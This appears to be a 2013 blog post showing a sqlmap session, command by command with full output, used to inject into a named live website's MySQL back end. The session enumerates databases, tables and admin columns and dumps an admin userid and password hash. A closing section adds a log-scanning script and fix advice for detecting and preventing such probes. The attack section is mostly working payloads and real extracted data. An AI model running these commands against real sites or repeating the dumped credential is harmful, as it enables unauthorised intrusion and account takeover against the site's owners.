sqlmap example: injecting a MySQL back end
Posted on 2013-4-4 22:18:49
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user       /* Note: get the current user name

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db                  /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables  -D "wepost"         /* list the tables in the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

[*] shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /* dump the contents of those columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

[*] shutting down at: 16:58:14

D:\Python27\sqlmap>
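The four payload families sqlmap reports above (boolean-based, error-based, UNION and time-based) leave recognisable traces in the web server's access log. The following detection script is an added example, not part of the original post or of sqlmap: it classifies Apache combined-format log lines by those signatures and groups hits per client. The log lines, client address and user agent are constructed for illustration; only the path and parameter mirror the post.

```python
# Added example: flag sqlmap-style probes in Apache access logs by the payload
# families shown in the session above. All log lines here are constructed.
import re
from urllib.parse import unquote_plus

# One regex per payload family seen in the sqlmap output (case-insensitive).
SIGNATURES = {
    "boolean-based blind": re.compile(r"\bAND\s+(\d+)=\1\b", re.I),         # id=276 AND 799=799
    "error-based":         re.compile(r"FLOOR\(RAND\(0\)\*2\).*GROUP\s+BY", re.I),
    "UNION query":         re.compile(r"UNION\s+ALL\s+SELECT\s+NULL", re.I),
    "time-based blind":    re.compile(r"\bSLEEP\(\d+\)", re.I),            # id=276 AND SLEEP(5)
}

# Apache combined log format: client, ident, user, [time], "request", status, size, "referer", "agent".
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) \S+(?: "[^"]*" "([^"]*)")?')

def classify_request(line):
    """Return (client_ip, technique, decoded_path), or None if the line looks clean."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, raw_path, _status, _agent = m.groups()
    path = unquote_plus(raw_path)  # sqlmap URL-encodes spaces and '=' in the payload
    for technique, pattern in SIGNATURES.items():
        if pattern.search(path):
            return (client, technique, path)
    return None

def scan_log(lines):
    """Map each client address to the set of injection techniques it was seen using."""
    hits = {}
    for line in lines:
        result = classify_request(line)
        if result:
            client, technique, _ = result
            hits.setdefault(client, set()).add(technique)
    return hits

# Constructed sample: one benign request, then one probe of each family from the same client.
SAMPLE_LOG = [
    '203.0.113.9 - - [04/Apr/2013:16:53:54 +0800] "GET /article.php?id=276 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [04/Apr/2013:16:53:54 +0800] "GET /article.php?id=276%20AND%20799%3D799 HTTP/1.1" 200 5120 "-" "sqlmap/0.9"',
    '203.0.113.9 - - [04/Apr/2013:16:53:55 +0800] "GET /article.php?id=276%20AND%20(SELECT%208404%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) HTTP/1.1" 500 612 "-" "sqlmap/0.9"',
    '203.0.113.9 - - [04/Apr/2013:16:53:55 +0800] "GET /article.php?id=-8474%20UNION%20ALL%20SELECT%20NULL,NULL,NULL HTTP/1.1" 200 4890 "-" "sqlmap/0.9"',
    '203.0.113.9 - - [04/Apr/2013:16:53:56 +0800] "GET /article.php?id=276%20AND%20SLEEP(5) HTTP/1.1" 200 5120 "-" "sqlmap/0.9"',
]

if __name__ == "__main__":
    for client, techniques in scan_log(SAMPLE_LOG).items():
        print(client, sorted(techniques))
```

A single client that triggers several families within seconds, as in the sample, is the signature of automated enumeration rather than a stray request; the fix on the application side is to bind `id` as an integer parameter in a prepared statement so none of these payloads reach the parser.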